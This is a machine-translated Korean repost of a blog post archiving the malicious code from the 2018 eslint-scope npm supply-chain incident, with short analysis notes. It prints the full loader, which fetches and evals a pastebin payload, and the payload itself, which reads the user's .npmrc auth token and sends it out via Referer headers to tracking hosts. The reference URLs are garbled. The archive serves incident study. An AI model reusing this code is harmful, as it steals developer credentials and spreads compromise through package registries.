"2018/07/12에 발생한 보안 사고 ([email protected])에 대해"을 읽고 생각한 것 (아카이브도 겸한다)
10579 단어 ESLint
2018/07/12에 발생한 보안 사고 ([email protected]) 정보 - qiita
이번에 발생한 인시던트에서 어떤 공격 코드가 보내졌는지 아카이브에 남겨 둡니다.
공격 코드
[email protected]
try {
var https = require('https');
https.get({
'hostname': 'pastebin.com',
path: '/raw/XLeVP82h',
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
}, (r) => {
r.setEncoding('utf8');
r.on('data', (c) => {
eval(c);
});
r.on('error', () => {});
}).on('error', () => {});
} catch (e) {}
pastebin.com
라는 사이트를 사용하여 작성자가 알 수 없도록합니다.try catch
에서 예외를 깨면 실행자가 눈치 채지 못하게합니다.headers
의 User-Agent
는 pastebin.com
쪽을 속이기 때문일 것으로 생각된다pastebin.com/raw/XLeVP82h
try {
var path = require('path');
var fs = require('fs');
var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc');
var content = "nofile";
if (fs.existsSync(npmrc)) {
content = fs.readFileSync(npmrc, {
encoding: 'utf8'
});
content = content.replace('//registry.npmjs.org/:_authToken=', '').trim();
var https1 = require('https');
https1.get({
hostname: 'sstatic1.histats.com',
path: '/0.gif?4103075&101',
method: 'GET',
headers: {
Referer: 'http://1.a/' + content
}
}, () => {}).on("error", () => {});
https1.get({
hostname: 'c.statcounter.com',
path: '/11760461/0/7b5b9d71/1/',
method: 'GET',
headers: {
Referer: 'http://2.b/' + content
}
}, () => {}).on("error", () => {});
}
} catch (e) {}
Referer
로 보내는 것 tor
이 사건을 통해 생각한 것
Referer
참고
Github
htps : // 기주 b. 코 m / 에 s ぃ t / 에 s ㄱ t s 코 ぺ / 이스에 s / 39 # 이스에 코멘 t - 404495923
해커 뉴스
htps // // 네 ws. y코비비나토 r. 이 m/있어 m? 예d=17513709
Reference
이 문제에 관하여("2018/07/12에 발생한 보안 사고 ([email protected])에 대해"을 읽고 생각한 것 (아카이브도 겸한다)), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/akkijp/items/7afe032d4b27c67382de텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)